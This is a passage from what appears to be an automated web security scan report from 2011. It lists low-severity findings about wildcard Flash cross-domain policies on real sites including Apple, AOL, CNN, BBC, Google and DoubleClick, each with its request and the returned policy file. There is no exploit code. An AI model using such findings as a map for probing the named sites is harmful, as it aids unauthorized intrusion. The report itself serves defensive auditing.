The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=600
Expires: Thu, 05 May 2011 12:53:21 GMT
Date: Thu, 05 May 2011 12:43:21 GMT
Connection: close
Set-Cookie: ccl=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; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

6.87. http://itunes.apple.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 13 Apr 2011 15:19:07 GMT
ETag: "1b0-4a0ce546d50c0"
Accept-Ranges: bytes
Content-Length: 432
Content-Type: text/xml
Cache-Control: public, no-transform, max-age=2114
Date: Thu, 05 May 2011 10:53:09 GMT
Connection: close
X-Apple-Partner: origin.0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.apple.com" />
<allow-access-from domain="*.apple.com.edgesuite.net" />
<allow-access-from domain="nikeplus.nike.com"/>
<allow-access-from domain="nikerunning.nike.com"/>
...[SNIP]...

6.88. http://js.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 01:28:58 GMT
Date: Thu, 05 May 2011 00:58:58 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

6.89. http://legal.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://legal.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: legal.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:14 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999926
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.90. http://money.cnn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: money.cnn.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:13 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 16:52:05 GMT
Accept-Ranges: bytes
Content-Length: 922
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cnn.com" />
<allow-access-from domain="*.turner.com" />
<allow-access-from domain="*.cnn.net" />
<allow-access-from domain="*.secondthought.com"/>
<allow-access-from domain="72.3.226.28"/>
<allow-access-from domain="isg-marketing.com"/>
<allow-access-from domain="*.isg-marketing.com"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="studio.doubleclick.com"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...

6.91. http://music.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

6.92. http://my.screenname.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 21:13:54 GMT
ETag: "3f1-4a1601a1ec880"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=6
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...

6.93. https://my.screenname.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://my.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 21:13:54 GMT
ETag: "3f1-4a1601a1ec880"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...

6.94. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=115
Expires: Thu, 05 May 2011 12:39:38 GMT
Date: Thu, 05 May 2011 12:37:43 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

6.95. http://o.aolcdn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=1017380
Expires: Mon, 16 May 2011 19:33:10 GMT
Date: Thu, 05 May 2011 00:56:50 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...

6.96. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 04 May 2011 15:21:29 GMT
Expires: Thu, 05 May 2011 15:21:29 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 34589

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.97. http://picasaweb.google.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Fri, 06 May 2011 10:53:28 GMT
Date: Thu, 05 May 2011 10:53:28 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.98. http://privacy.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://privacy.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: privacy.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:42:16 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 419
Keep-Alive: timeout=5, max=999802
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.adsonar.com" />
<allow-access-from domain="*.advertising.com" />
<allow-access-from domain="*.tacoda.net" />
...[SNIP]...

6.99. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 04 May 2011 03:32:36 GMT
Expires: Thu, 05 May 2011 03:32:36 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 77119
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
